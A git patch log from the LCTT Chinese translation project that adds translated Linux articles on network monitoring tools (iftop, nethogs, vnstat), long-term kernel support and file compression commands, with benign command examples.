root and specify the interface to listen on. It displays the hoggy application and the process number, so that you may kill it if you so desire: - -``` -$ sudo nethogs wlan0 - -NetHogs version 0.8.1 - -PID USER PROGRAM DEV SENT RECEIVED -7690 carla /usr/lib/firefox wlan0 12.494 556.580 KB/sec -5648 carla .../chromium-browser wlan0 0.052 0.038 KB/sec -TOTAL 12.546 556.618 KB/sec -``` - -Nethogs has few options: cycling between kb/s, kb, b, and mb, sorting by received or sent packets, and adjusting the delay between refreshes. See `man nethogs`, or run `nethogs -h`. - -### vnstat - -[vnstat][11] is the easiest network data collector to use. It is lightweight and does not need root permissions. It runs as a daemon and records your network statistics over time. The `vnstat`command displays the accumulated data: - -``` -$ vnstat -i wlan0 -Database updated: Tue Oct 17 08:36:38 2017 - - wlan0 since 10/17/2017 - - rx: 45.27 MiB tx: 3.77 MiB total: 49.04 MiB - - monthly - rx | tx | total | avg. rate - ------------------------+-------------+-------------+--------------- - Oct '17 45.27 MiB | 3.77 MiB | 49.04 MiB | 0.28 kbit/s - ------------------------+-------------+-------------+--------------- - estimated 85 MiB | 5 MiB | 90 MiB | - - daily - rx | tx | total | avg. rate - ------------------------+-------------+-------------+--------------- - today 45.27 MiB | 3.77 MiB | 49.04 MiB | 12.96 kbit/s - ------------------------+-------------+-------------+--------------- - estimated 125 MiB | 8 MiB | 133 MiB | -``` - -By default it displays all network interfaces. Use the `-i` option to select a single interface. Merge the data of multiple interfaces this way: - -``` -$ vnstat -i wlan0+eth0+eth1 -``` - -You can filter the display in several ways: - -* **-h** displays statistics by hours. - -* **-d** displays statistics by days. - -* **-w** and **-m** displays statistics by weeks and months. - -* Watch live updates with the **-l** option. - -This command deletes the database for wlan1 and stops watching it: - -``` -$ vnstat -i wlan1 --delete -``` - -This command creates an alias for a network interface. This example uses one of the weird interface names from Ubuntu 16.04: - -``` -$ vnstat -u -i enp0s25 --nick eth0 -``` - -By default vnstat monitors eth0\. You can change this in `/etc/vnstat.conf`, or create your own personal configuration file in your home directory. See `man vnstat` for a complete reference. - -You can also install vnstati to create simple, colored graphs (Figure 2): - -``` -$ vnstati -s -i wlx7cdd90a0a1c2 -o vnstat.png -``` - - -![vnstati](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-2_5.png?itok=HsWJMcW0 "vnstati") -Figure 2: You can create simple colored graphs with vnstati.[Used with permission][2] - -See `man vnstati` for complete options. - - _Learn more about Linux through the free ["Introduction to Linux" ][7]course from The Linux Foundation and edX._ - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/10/3-simple-excellent-linux-network-monitors - -作者:[CARLA SCHRODER ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/cschroder -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/used-permission -[3]:https://www.linux.com/licenses/category/used-permission -[4]:https://www.linux.com/files/images/fig-1png-8 -[5]:https://www.linux.com/files/images/fig-2png-5 -[6]:https://www.linux.com/files/images/bannerpng-3 -[7]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux -[8]:http://www.ex-parrot.com/pdw/iftop/ -[9]:https://www.linux.com/learn/intro-to-linux/2017/8/how-calculate-network-addresses-ipcalc -[10]:http://www.tcpdump.org/manpages/pcap-filter.7.html -[11]:http://humdi.net/vnstat/ diff --git a/translated/tech/20171019 3 Simple Excellent Linux Network Monitors.md b/translated/tech/20171019 3 Simple Excellent Linux Network Monitors.md new file mode 100644 index 0000000000..e683664453 --- /dev/null +++ b/translated/tech/20171019 3 Simple Excellent Linux Network Monitors.md @@ -0,0 +1,190 @@ +三款简单而优秀的Linux网络监视工具 +============================================================ + +![network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner_3.png?itok=iuPcSN4k "network") +通过iftop,Nethogs和vnstat详细了解你的网络连接状态。[经许可使用][3] + +你可以通过这三个Linux命令了解当前网络的大量信息。iftop通过进程号跟踪网络连接,Nethogs快速告知你哪些进程在占用你的带宽,而vnstat以一个良好的轻量级守护进程在后台运行,并实时记录你的网络使用情况。 + +### iftop + +优秀的iftop可以监听您指定的网络接口,并以top的样式呈现。 + +这是一个不错的小工具,用于找出网络拥塞,测速和维持网络流量总量。看到自己到底在用多少带宽往往是非常惊人的,尤其是对于我们这些仍然记得电话线路,调制解调器,“高速”到令人惊叫的kb和实时波特率的老人们。我们在很久之前就不再使用波特率,转而钟情于比特率。波特率用于衡量信号变化,尽管有时候与比特率相同,但大多数情况下并非如此。 + +如果你只有一个网络接口,直接运行iftop即可。不过iftop需要root权限: + +``` +$ sudo iftop +``` + +如果你有多个,那就指定你要监控的接口: + +``` +$ sudo iftop -i wlan0 +``` + +就像top命令一样,你可以在命令运行时更改显示选项: + +* **h** 切换帮助界面。 + +* **n** 是否解析域名。 + +* **s** 切换源地址的显示,**d**则切换目的地址的显示。 + +* **S** 是否显示端口号。 + +* **N** 是否解析端口;若关闭解析则显示端口号。 + +* **t**切换文本显示接口。默认的显示方式需要ncurses。我个人认为图1的显示方式在组织性和可读性都更加良好。 + +* **p** 暂停显示更新。 + +* **q** 退出程序。 + + +![text display](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-1_8.png?itok=luKHS5ve "text display") +图 1:组织性和可读性良好的文本显示。[经许可使用][1] + +当你切换显示设置的时候,iftop并不会中断监测流量。当然你也可以单独监测一台主机。而这需要主机的IP地址和子网掩码。现在,我很好奇Pandora(译者注:一家美国的电台公司)能给我贫瘠的带宽带来多大的负载。因此我首先使用dig命令找到他们的IP地址: + +``` +$ dig A pandora.com +[...] +;; ANSWER SECTION: +pandora.com. 267 IN A 208.85.40.20 +pandora.com. 267 IN A 208.85.40.50 +``` + +那子网掩码呢?[ipcalc][9]会告诉我们: + +``` +$ ipcalc -b 208.85.40.20 +Address: 208.85.40.20 +Netmask: 255.255.255.0 = 24 +Wildcard: 0.0.0.255 +=> +Network: 208.85.40.0/24 +``` + +现在,将IP地址和子网掩码提供给iftop: + +``` +$ sudo iftop -F 208.85.40.20/24 -i wlan0 +``` + +很棒的不是么?而我也很惊奇地发现,Pandora在我的网络上,每小时大约使用500kb。并且就像大多数流媒体服务一样,Pandora的流量在迅速增长,并依靠缓存稳定下来。 + + +你可以使用**-G**选项对IPv6地址执行相同的操作。查阅友好的man可以帮助你了解iftop的其他功能,包括使用个人配置文件自定义你的默认选项,以及使用自定义过滤(请参阅 [PCAP-FILTER][10] 来获取过滤指南)。 + +### Nethogs + +当你想要快速了解是谁在吸取你的带宽的时候,Nethogs是个快速而简单的方法。你需要以root身份运行并指定要监听的接口。它会给你显示大量的应用程序及其进程号,所以如果你想的话,你可以借此杀死任一进程。 + +``` +$ sudo nethogs wlan0 + +NetHogs version 0.8.1 + +PID USER PROGRAM DEV SENT RECEIVED +7690 carla /usr/lib/firefox wlan0 12.494 556.580 KB/sec +5648 carla .../chromium-browser wlan0 0.052 0.038 KB/sec +TOTAL 12.546 556.618 KB/sec +``` + +Nethogs并没有多少选项:在kb/s,kb,b,mb之间循环,按接收和发送的数据包排序,调整刷新延迟。具体请看`man nethogs`,或者是运行`nethogs -h`。 + +### vnstat + +[vnstat][11]是最容易使用的网络数据收集工具。它十分轻量并且不需要root权限。它以守护进程在后台运行,因此可以实时地记录你的网络数据。单个`vnstat`命令就可以显示所累计的数据。 + +``` +$ vnstat -i wlan0 +Database updated: Tue Oct 17 08:36:38 2017 + + wlan0 since 10/17/2017 + + rx: 45.27 MiB tx: 3.77 MiB total: 49.04 MiB + + monthly + rx | tx | total | avg. rate + ------------------------+-------------+-------------+--------------- + Oct '17 45.27 MiB | 3.77 MiB | 49.04 MiB | 0.28 kbit/s + ------------------------+-------------+-------------+--------------- + estimated 85 MiB | 5 MiB | 90 MiB | + + daily + rx | tx | total | avg. rate + ------------------------+-------------+-------------+--------------- + today 45.27 MiB | 3.77 MiB | 49.04 MiB | 12.96 kbit/s + ------------------------+-------------+-------------+--------------- + estimated 125 MiB | 8 MiB | 133 MiB | +``` + +默认情况下它会显示所有的网络接口。使用`-i`选项来选择某个接口。也可以像这样合并多个接口的数据: + +``` +$ vnstat -i wlan0+eth0+eth1 +``` + +你可以通过这几种方式过滤数据显示: + +* **-h** 按小时显示统计信息。 + +* **-d** 按天显示统计信息. + +* **-w**和**-m**分别按周和月份来显示统计信息。 + +* 使用**-l**选项查看实时更新。 + +以下这条命令将会删除wlan1的数据库并不再监视它: + +``` +$ vnstat -i wlan1 --delete +``` + +而这条命令将会为你的一个网络接口创建一个别名。这个例子使用了Ubuntu16.04的一个有线接口名称: + +``` +$ vnstat -u -i enp0s25 --nick eth0 +``` + +默认情况下,vnstat会监视eth0。你可以在`/etc/vnstat.conf`对它进行修改,或者在你的home目录下创建你自己的个人配置文件。请参阅`man vnstat`以获取完整的指南。 + +你也可以安装vnstati来创建简单的彩图(图 2): + +``` +$ vnstati -s -i wlx7cdd90a0a1c2 -o vnstat.png +``` + + +![vnstati](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-2_5.png?itok=HsWJMcW0 "vnstati") +图 2:你可以使用vnstati来创建简单的彩图。[经许可使用][2] + +请参阅`man vnstati`以获取完整的选项。 + + +_欲了解 Linux 的更多信息,可以通过学习 Linux 基金会和 edX 的免费课程,[“Linux 入门”][7]。_ +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/10/3-simple-excellent-linux-network-monitors + +作者:[CARLA SCHRODER ][a] +译者:[KeyLD](https://github.com/KeyLD) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/cschroder +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/used-permission +[3]:https://www.linux.com/licenses/category/used-permission +[4]:https://www.linux.com/files/images/fig-1png-8 +[5]:https://www.linux.com/files/images/fig-2png-5 +[6]:https://www.linux.com/files/images/bannerpng-3 +[7]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[8]:http://www.ex-parrot.com/pdw/iftop/ +[9]:https://www.linux.com/learn/intro-to-linux/2017/8/how-calculate-network-addresses-ipcalc +[10]:http://www.tcpdump.org/manpages/pcap-filter.7.html +[11]:http://humdi.net/vnstat/ From 1c174b26a6a16c0eb07b7f8c5f2de7a3e63f593b Mon Sep 17 00:00:00 2001 From: nodekey Date: Sat, 23 Dec 2017 01:00:59 +0800 Subject: [PATCH 0759/1627] translated --- .../tech/20171019 3 Simple Excellent Linux Network Monitors.md | 1 + 1 file changed, 1 insertion(+) diff --git a/translated/tech/20171019 3 Simple Excellent Linux Network Monitors.md b/translated/tech/20171019 3 Simple Excellent Linux Network Monitors.md index e683664453..d1e68a4be1 100644 --- a/translated/tech/20171019 3 Simple Excellent Linux Network Monitors.md +++ b/translated/tech/20171019 3 Simple Excellent Linux Network Monitors.md @@ -166,6 +166,7 @@ $ vnstati -s -i wlx7cdd90a0a1c2 -o vnstat.png _欲了解 Linux 的更多信息,可以通过学习 Linux 基金会和 edX 的免费课程,[“Linux 入门”][7]。_ + -------------------------------------------------------------------------------- via: https://www.linux.com/learn/intro-to-linux/2017/10/3-simple-excellent-linux-network-monitors From a6d44fda4f3c844acfde9c8de5dfbf32cb077706 Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 23 Dec 2017 10:31:48 +0800 Subject: [PATCH 0760/1627] PRF&PUB:20171127 Long-term Linux support future clarified.md @liuxinyu123 https://linux.cn/article-9166-1.html --- ...ong-term Linux support future clarified.md | 55 +++++++++++++++++++ ...ong-term Linux support future clarified.md | 45 --------------- 2 files changed, 55 insertions(+), 45 deletions(-) create mode 100644 published/20171127 Long-term Linux support future clarified.md delete mode 100644 translated/tech/20171127 Long-term Linux support future clarified.md diff --git a/published/20171127 Long-term Linux support future clarified.md b/published/20171127 Long-term Linux support future clarified.md new file mode 100644 index 0000000000..f167a791b0 --- /dev/null +++ b/published/20171127 Long-term Linux support future clarified.md @@ -0,0 +1,55 @@ +Linux 长期支持版关于未来的声明 +=============================== + +> Linux 4.4 长期支持版(LTS)将得到 6年的使用期,但是这并不意味着其它长期支持版的使用期将持续这么久。 + +[视频](http://android-streaming.techrepublic.com/media/2014/10/17/343832643820/1242911146001_1697467424001_zdnet-linux-linus-2point7_1189834_740.mp4) + +_视频: Torvalds 对内核版本 2.6 的弹性感到惊讶_ + +在 2017 年 10 月,[Linux 内核小组同意将 Linux 长期支持版(LTS)的下一个版本的生命期从两年延长至六年][5],而 LTS 的下一个版本正是 [Linux 4.14][6]。这对于 [Android][7],嵌入式 Linux 和 Linux 物联网(IoT)的开发者们是一个利好。但是这个变动并不意味着将来所有的 Linux LTS 版本将有 6 年的使用期。 + +正如 [Linux 基金会][8]的 IT 技术设施安全主管 Konstantin Ryabitsev 在 Google+ 上发文解释说,“尽管外面的各种各样的新闻网站可能已经告知你们,但是[内核版本 4.14 的 LTS 并不计划支持 6 年][9]。只是因为 Greg Kroah-Hartman 正在为 LTS 4.4 版本做这项工作并不表示从现在开始所有的 LTS 内核会维持那么久。” + +所以,简而言之,Linux 4.14 将支持到 2020 年 1月份,而 2016 年 1 月 20 号问世的 Linux 4.4 内核将支持到 2022 年。因此,如果你正在编写一个打算能够长期运行的 Linux 发行版,那你需要基于 [Linux 4.4 版本][10]。 + +[Linux LTS 版本][11]包含对旧内核树的后向移植漏洞的修复。不是所有漏洞的修复都被导入进来,只有重要漏洞的修复才用于这些内核中。它们不会非常频繁的发布,特别是对那些旧版本的内核树来说。 + +Linux 其它的版本有尝鲜版Prepatch或发布候选版(RC)、主线版Mainline稳定版Stable和 LTS 版。 + +RC 版必须从源代码编译并且通常包含漏洞的修复和新特性。这些都是由 Linux Torvalds 维护和发布的。他也维护主线版本树(这是所有新特性被引入的地方)。新的主线内核每几个月发布一次。当主线版本树发布以便通用时,它被称为“稳定版”。稳定版的内核漏洞修复是从主线版本树后向移植的,并且这些修复是由一个指定的稳定版内核维护者来申请。在下一个主线内核变得可用之前,通常也有一些修复漏洞的内核发布。 + +对于最新的 LTS 版本,Linux 4.14,Ryabitsev 说,“Greg 已经担负起了 4.14 版本的维护者责任(过去发生过多次),其他人想成为该版本的维护者也是有可能的,但是你最后不要指望。" + +Kroah-Hartman 对 Ryabitsev 的帖子回复道:“[他说神马。][12]” + +------------------- +via: http://www.zdnet.com/article/long-term-linux-support-future-clarified/ + +作者:[Steven J. Vaughan-Nichols][a] +译者:[liuxinyu123](https://github.com/liuxinyu123) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ +[1]:http://www.zdnet.com/article/long-term-linux-support-future-clarified/#comments-eb4f0633-955f-4fec-9e56-734c34ee2bf2 +[2]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ +[3]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ +[4]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ +[5]:http://www.zdnet.com/article/long-term-support-linux-gets-a-longer-lease-on-life/ +[6]:http://www.zdnet.com/article/the-new-long-term-linux-kernel-linux-4-14-has-arrived/ +[7]:https://www.android.com/ +[8]:https://www.linuxfoundation.org/ +[9]:https://plus.google.com/u/0/+KonstantinRyabitsev/posts/Lq97ZtL8Xw9 +[10]:http://www.zdnet.com/article/whats-new-and-nifty-in-linux-4-4/ +[11]:https://www.kernel.org/releases.html +[12]:https://plus.google.com/u/0/+gregkroahhartman/posts/ZUcSz3Sn1Hc +[13]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ +[14]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ +[15]:http://www.zdnet.com/blog/open-source/ +[16]:http://www.zdnet.com/topic/enterprise-software/ + + + + diff --git a/translated/tech/20171127 Long-term Linux support future clarified.md b/translated/tech/20171127 Long-term Linux support future clarified.md deleted file mode 100644 index ef41a81cf3..0000000000 --- a/translated/tech/20171127 Long-term Linux support future clarified.md +++ /dev/null @@ -1,45 +0,0 @@ -Linux 长期支持版关于未来的声明 -=============================== -Linux 4.4 长期支持版将得到 6年的使用期,但是这并不意味着其它长期支持版的使用期将持续这么久。 -[视频](http://www.zdnet.com/video/video-torvalds-surprised-by-resilience-of-2-6-kernel-1/) - _视频: Torvalds 对内核版本 2.6 的弹性感到惊讶_ - -在 2017 年 10 月,[Linux 内核小组同意将 Linux 长期支持版(LTS)的下一个版本的生命期从两年延长至六年][5],而 LTS 的下一个版本正是 [Linux 4.14][6]。这对于 [Android][7],嵌入式 Linux 和 Linux 物联网(IoT)的开发者们是一个利好。但是这个变动并不意味着将来所有的 Linux LTS 版本将有 6 年的使用期。 -正如 [Linux 基金会][8]的 IT 技术设施安全主管 Konstantin Ryabitsev 在 google+ 上发文解释说,"尽管外面的各种各样的新闻网站可能已经告知你们,但是[内核版本 4.14 的 LTS 并不计划支持 6 年][9]。仅仅因为 Greg Kroah-Hartman 正在为 LTS 4.4 版本做这项工作并不表示从现在开始所有的 LTS 内核会维持那么久。" -所以,简而言之,Linux 4.14 将支持到 2020年 1月份,而 2016 年 1 月 20 号问世的 Linux 4.4 内核将支持到 2022 年。因此,如果你正在编写一个打算能够长期运行的 Linux 发行版,那你需要基于 [Linux 4.4 版本][10]。 -[Linux LTS 版本][11]包含对旧内核树的后向移植漏洞的修复。不是所有漏洞的修复都被导入进来,只有重要漏洞的修复才用于这些内核中。它们不会非常频繁的发布,特别是对那些旧版本的内核树来说。 -Linux 其它的版本有尝鲜版或发布候选版(RC),主线版,稳定版和 LTS 版。 -RC 版必须从源代码编译并且通常包含漏洞的修复和新特性。这些都是由 Linux Torvalds 维护和发布的。他也维护主线版本树(这是所有新特性被引入的地方)。新的主线内核每几个月发布一次。当主线版本树为了通用才发布时,它被称为"稳定版"。一个稳定版内核漏洞的修复是从主线版本树后向移植的,并且这些修复是由一个指定的稳定版内核维护者来申请。在下一个主线内核变得可用之前,通常也有一些修复漏洞的内核发布。 -对于最新的 LTS 版本,Linux 4.14,Ryabitsev 说,"Greg 已经担负起了 4.14 版本的维护者责任(过去发生过多次),其他人想成为该版本的维护者也是有可能的,但是你应该断然不要去计划这件事。" -Kroah-Hartman 在 Ryabitsev 的文章中仅仅添加了:"[他的言论][12]" - -------------------- -via: http://www.zdnet.com/article/long-term-linux-support-future-clarified/ - -作者:[Steven J. Vaughan-Nichols ][a] -译者:[liuxinyu123](https://github.com/liuxinyu123) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ -[1]:http://www.zdnet.com/article/long-term-linux-support-future-clarified/#comments-eb4f0633-955f-4fec-9e56-734c34ee2bf2 -[2]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ -[3]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ -[4]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/ -[5]:http://www.zdnet.com/article/long-term-support-linux-gets-a-longer-lease-on-life/ -[6]:http://www.zdnet.com/article/the-new-long-term-linux-kernel-linux-4-14-has-arrived/ -[7]:https://www.android.com/ -[8]:https://www.linuxfoundation.org/ -[9]:https://plus.google.com/u/0/+KonstantinRyabitsev/posts/Lq97ZtL8Xw9 -[10]:http://www.zdnet.com/article/whats-new-and-nifty-in-linux-4-4/ -[11]:https://www.kernel.org/releases.html -[12]:https://plus.google.com/u/0/+gregkroahhartman/posts/ZUcSz3Sn1Hc -[13]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ -[14]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/ -[15]:http://www.zdnet.com/blog/open-source/ -[16]:http://www.zdnet.com/topic/enterprise-software/ - - - - From 675a7bab88246184a69b27654b9f6ba823a48d58 Mon Sep 17 00:00:00 2001 From: Ocputs <15391606236@163.com> Date: Sat, 23 Dec 2017 20:43:54 +0800 Subject: [PATCH 0761/1627] origin version --- ... the most out of Linux file compression.md | 115 ++++++++++++++++++ .../tech/如何最大程度的压缩Linux文件.md | 69 ----------- 2 files changed, 115 insertions(+), 69 deletions(-) create mode 100644 translated/tech/20171214 How to squeeze the most out of Linux file compression.md delete mode 100644 translated/tech/如何最大程度的压缩Linux文件.md diff --git a/translated/tech/20171214 How to squeeze the most out of Linux file compression.md b/translated/tech/20171214 How to squeeze the most out of Linux file compression.md new file mode 100644 index 0000000000..1b6eeeccda --- /dev/null +++ b/translated/tech/20171214 How to squeeze the most out of Linux file compression.md @@ -0,0 +1,115 @@ +如何优雅的使用大部分的 Linux 文件压缩 +======= + 如果你对 linux 系统下的对文件压缩命令或操作的有效性有任何疑问 ,你应该看一下 **apropos compress** 这个命令的输出 ;如果你有机会这么做 ,你会惊异于有如此多的的命令来进行压缩文件和解压缩文件 ;还有许多命令来进行压缩文件的比较 ,检验 ,并且能够在压缩文件中的内容中进行搜索 ,甚至能够把压缩文件从一个格式变成另外一种格式 ( *.z 格式变为 *.gz 格式 ) 。 + 你想在所有词目中寻找一组 bzip2 的压缩命令 。包括 zip ,gzip ,和 xz 在内 ,你将得到一个有意思的操作。 + +``` +$ apropos compress | grep ^bz + bzcat (1) - decompresses files to stdout + bzcmp (1) - compare bzip2 compressed files + bzdiff (1) - compare bzip2 compressed files + bzegrep (1) - search possibly bzip2 compressed files for a regular expression + bzexe (1) - compress executable files in place + bzfgrep (1) - search possibly bzip2 compressed files for a regular expression + bzgrep (1) - search possibly bzip2 compressed files for a regular expression + bzip2 (1) - a block-sorting file compressor, v1.0.6 + bzless (1) - file perusal filter for crt viewing of bzip2 compressed text + bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text +``` + + 在我的Ubuntu系统上 ,列出了超过 60 条命令作为 apropos compress 命令的返回 。 + +## 压缩算法 + 压缩并没有普适的方案 ,某些压缩工具是有损耗的压缩 ,例如能够使 mp3 文件减小大小而能够是听者有接近聆听原声的音乐感受 。但是 Linux 命令行能够用算法使压缩文件或档案文件能够重新恢复为原始数据 ,换句话说 ,算法能够使压缩或存档无损 。 + + 这是如何做到的 ?300 个相同的在一行的相同的字符能够被压缩成像 “300x” 。但是这种算法不会对大多数的文件产生有效的益处 。因为文件中完全随机的序列要比相同字符的序列要多的多 。 压缩算法会越来越复杂和多样 ,所以在 Unix 早期 ,压缩是第一个被介绍的 。 + +## 在 Linux 系统上的压缩命令 + 在 Linux 系统上最常用的压缩命令是 zip ,gzip ,bzip2 ,xz 。 前面提到的常用压缩命令以同样的方式工作 。会权衡文件内容压缩程度 ,压缩花费的时间 ,压缩文件在其他你需要使用的系统上的兼容性 。 + 一些时候压缩一个文件并不会花费很多时间和性能 。在下面的例子中 ,被压缩的文件会比原始文件要大 。当在一个不是很普遍的情况下 ,尤其是在文件内容达到一定等级的随机度 。 + +``` +$ time zip bigfile.zip bigfile + adding: bigfile (default 0% ) +real 0m0.055s +user 0m0.000s +sys 0m0.016s +$ ls -l bigfile* +-rw-r--r-- 1 root root 0 12月 20 22:36 bigfile +-rw------- 1 root root 164 12月 20 22:41 bigfile.zip +``` + 注意压缩后的文件 ( bigfile.zip ) 比源文件 ( bigfile ) 要大 。如果压缩增加了文件的大小或者减少的很少的百分比 ,那就只剩下在线备份的好处了 。如果你在压缩文件后看到了下面的信息 。你不会得到太多的益处 。 + ( defalted 1% ) + + 文件内容在文件压缩的过程中有很重要的作用 。在上面文件大小增加的例子中是因为文件内容过于随机 。压缩一个文件内容只包含 0 的文件 。你会有一个相当震惊的压缩比 。在如此极端的情况下 ,三个常用的压缩工具都有非常棒的效果 。 + +``` +-rw-rw-r-- 1 shs shs 10485760 Dec 8 12:31 zeroes.txt +-rw-rw-r-- 1 shs shs 49 Dec 8 17:28 zeroes.txt.bz2 +-rw-rw-r-- 1 shs shs 10219 Dec 8 17:28 zeroes.txt.gz +-rw-rw-r-- 1 shs shs 1660 Dec 8 12:31 zeroes.txt.xz +-rw-rw-r-- 1 shs shs 10360 Dec 8 12:24 zeroes.zip +``` + 你不会喜欢为了查看文件中的 50 个字节的而将 10 0000 0000 字节的数据完全解压 。这样是及其不可能的 。 + 在更真实的情况下 ,大小差异是总体上的不同 -- 不是重大的效果 -- 对于一个小的公正的 jpg 的图片文件 。 + +``` +-rw-r--r-- 1 shs shs 13522 Dec 11 18:58 image.jpg +-rw-r--r-- 1 shs shs 13875 Dec 11 18:58 image.jpg.bz2 +-rw-r--r-- 1 shs shs 13441 Dec 11 18:58 image.jpg.gz +-rw-r--r-- 1 shs shs 13508 Dec 11 18:58 image.jpg.xz +-rw-r--r-- 1 shs shs 13581 Dec 11 18:58 image.jpg.zip +``` + + 在压缩拉的文本文件时 ,你会发现重要的不同 。 +``` +$ ls -l textfile* + -rw-rw-r-- 1 shs shs 8740836 Dec 11 18:41 textfile + -rw-rw-r-- 1 shs shs 1519807 Dec 11 18:41 textfile.bz2 + -rw-rw-r-- 1 shs shs 1977669 Dec 11 18:41 textfile.gz + -rw-rw-r-- 1 shs shs 1024700 Dec 11 18:41 textfile.xz + -rw-rw-r-- 1 shs shs 1977808 Dec 11 18:41 textfile.zip +``` + + 在这种情况下 ,XZ 相较于其他压缩文件有效的减小了文件的大小 ,对于第二的 bzip2 命令也有很大的提高 + +## 查看压缩文件 + + 以 more 结尾的命令能够让你查看压缩文件而不解压文件 。 + +``` +bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text +lzmore (1) - view xz or lzma compressed (text) files +xzmore (1) - view xz or lzma compressed (text) files +zmore (1) - file perusal filter for crt viewing of compressed text +``` + 这些命令在大多数工作中被使用 ,自从不得不使文件解压缩而只为了显示给用户 。在另一方面 ,留下被解压的文件在系统中 。这些命令简单的使文件解压缩 。 + +``` +$ xzmore textfile.xz | head -1 + Here is the agenda for tomorrow's staff meeting: +``` + +## 比较压缩文件 + 许多的压缩工具箱包含一个差异命令 ( 例如 :xzdiff ) 。这些工具通过这些工作来进行比较和差异而不是做算法指定的比较 。例如 ,xzdiff 命令比较 bz2 类型的文件和比较 xz 类型的文件一样简单 。 + +## 如何选择最好的 Linux 压缩工具 + 如何选择压缩工具取决于你工作 。在一些情况下 ,选择取决于你所压缩的数据内容 。在更多的情况下 ,取决你你组织的惯例 ,除非你对磁盘空间有着很高的敏感度 。下面是一般的建议 : + zip :文件需要被分享或者会在 Windows 系统下使用 。 + gzip :文件在 Unix/Linux 系统下使用 。长远来看 ,bzip2 是普遍存在的 。 + bzip2 :使用了不同的算法 ,产生比 gzip 更小的文件 ,但是花更长的时间 。 + xz :一般提供做好的压缩率 ,但是也会花费相当的时间 。比其他工具更新 ,可能在你工作的系统上不存在 。 + +## 注意 + 当你在压缩文件时,你有很多选择 ,在极少的情况下 ,会产生无效的磁盘存储空间。 + +-------------------------------------------------------------------------------- +via: https://www.networkworld.com/article/3240938/linux/how-to-squeeze-the-most-out-of-linux-file-compression.html + +作者 :[ Sandra Henry-Stocker ][1] 译者:[ Octopus ][2] 校对:校对者ID + +本文由 [ LCTT ][3]原创编译,Linux中国 荣誉推出 + +[1]:https://www.networkworld.com +[2]:https://github.com/singledo +[3]:https://github.com/LCTT/TranslateProject \ No newline at end of file diff --git a/translated/tech/如何最大程度的压缩Linux文件.md b/translated/tech/如何最大程度的压缩Linux文件.md deleted file mode 100644 index 2f7b0e20b3..0000000000 --- a/translated/tech/如何最大程度的压缩Linux文件.md +++ /dev/null @@ -1,69 +0,0 @@ -# 如何最大程度的压缩Linux文件 - 如果你对 linux 系统下的对文件压缩命令或操作有任何疑问 ,你应该看一下 *apropos compress* 这个命令的输出 ;如果你有机会这么做 ,你会惊异于有如此的的命令来进行压缩文件和解压缩文件 ;还有许多命令来进行压缩文件的比较 ,检验 ,并且能够在压缩文件中的内容中进行搜索 ,甚至能够把压缩文件从一个格式变成另外一种格式 ( *.z 格式变为 *.gz 格式 ) 。 - 你想在所有词目中寻找一组 bzip2 的压缩命令 。加上 zip ,gzip ,和 xz 。你将对下面的操作感兴趣。 - ``` - $ apropos compress | grep ^bz - bzcat (1) - decompresses files to stdout - bzcmp (1) - compare bzip2 compressed files - bzdiff (1) - compare bzip2 compressed files - bzegrep (1) - search possibly bzip2 compressed files for a regular expression - bzexe (1) - compress executable files in place - bzfgrep (1) - search possibly bzip2 compressed files for a regular expression - bzgrep (1) - search possibly bzip2 compressed files for a regular expression - bzip2 (1) - a block-sorting file compressor, v1.0.6 - bzless (1) - file perusal filter for crt viewing of bzip2 compressed text - bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text - ``` - 在我的Ubuntu系统上 ,列出了超过 60 条命令作为 apropos compress 命令的返回 。 - - ## 压缩算法 - 压缩并没有普适的方案 ,某些压缩工具是有损耗的 ,例如能够使 mp3 文件减小大小而能够是听者有接近聆听原声的音乐感受 。但是算法能够用 Linux 命令行压缩或存档而使文件能够重新恢复原始数据 ,换句话说 ,算法能够是压缩或存档无损 。 - - 这是如何做到的 ?300 个相同的在一行的相同的字符能够被压缩成像 “300x” 。但是这种算法不会对大多数的文件产生有效的益处 。因为文件中完全随机的序列要比相同字符的序列要多的多 。 压缩算法会越来越复杂和多样 ,所以在 Unix 早期压缩是第一个被介绍的 。 - - ## 在 Linux 系统上的压缩命令 - 在 Linux 系统上最常用的压缩命令是 zip ,gzip ,bzip2 ,xz 。 